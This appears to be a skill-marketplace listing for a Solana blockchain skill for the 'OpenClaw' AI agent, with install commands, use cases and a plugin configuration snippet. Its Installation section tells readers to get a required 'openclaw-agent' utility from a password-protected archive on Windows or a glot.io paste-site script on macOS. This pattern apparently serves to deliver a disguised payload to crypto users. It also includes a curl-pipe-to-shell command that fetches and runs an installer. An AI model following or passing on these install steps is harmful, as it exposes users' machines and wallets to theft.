solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage Solana wallets, monitor SPL tokens, track NFT metadata, and query transaction history directly using the OpenClaw AI agent. Install now for seamless web3 integration.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-1tfnzWhat This Skill Does
The solana skill enables the OpenClaw agent to interface directly with the Solana blockchain. It acts as a bridge between the AI agent and the network, allowing users to query balances, inspect account details, track transaction histories, and interact with SPL tokens. Whether you are using a Phantom, Solflare, or standard CLI-generated wallet, this skill provides the necessary command-line abstractions to perform complex on-chain queries without manual block explorer navigation. By integrating the openclaw-agent utility, the skill ensures secure communication with the blockchain, providing a seamless experience for developers and users who want to monitor their assets or audit specific wallet activities through an AI-driven interface.
Installation
To begin, ensure you have the openclaw-agent utility installed. On Windows, download and extract the provided package (password: openclaw). For macOS users, use the provided installation script found at the glot.io snippet link. Once the base agent is active, install the Solana CLI via the official script: sh -c "$(curl -sSfL https://release.solana.com/stable/install)". Finally, install this specific skill within your OpenClaw environment by executing: clawhub install openclaw/skills/skills/hightower6eu/solana-1tfnz. This will register the commands and ensure the agent can execute blockchain queries.
Use Cases
- Asset Management: Quickly check the SOL balance or specific SPL token holdings (like USDC or USDT) across multiple accounts.
- Transaction Auditing: Confirm the status and details of recent transactions by providing a signature hash.
- NFT Monitoring: Decode and view the metadata of specific NFT mint addresses using integrated Metaboss functionality.
- Account Exploration: Investigate account data, check stake accounts, or programmatically fetch token accounts for accounting purposes.
- Development Testing: Easily switch between Mainnet, Devnet, and custom RPC endpoints to verify smart contract interactions or deployment states.
Example Prompts
- "Check the current SOL balance and recent transaction history for address 7xKY..."
- "Can you show me the token account details for my wallet and list all my SPL token balances?"
- "Fetch the metadata for this NFT mint address: 6Z... and confirm if the transaction signature 4k... was successful."
Tips & Limitations
- Safety: Always verify addresses before querying to avoid exposing sensitive data, although this skill is read-heavy.
- RPC Stability: If you experience request failures, try switching your RPC provider using
solana config set --url <RPC_URL>. - Dependency: This skill is strictly dependent on the
openclaw-agentruntime; commands will fail if the utility is not actively running in the background. - Performance: For bulk operations, prefer using the provided JSON output flags to parse data programmatically rather than reading raw text.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-1tfnz": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.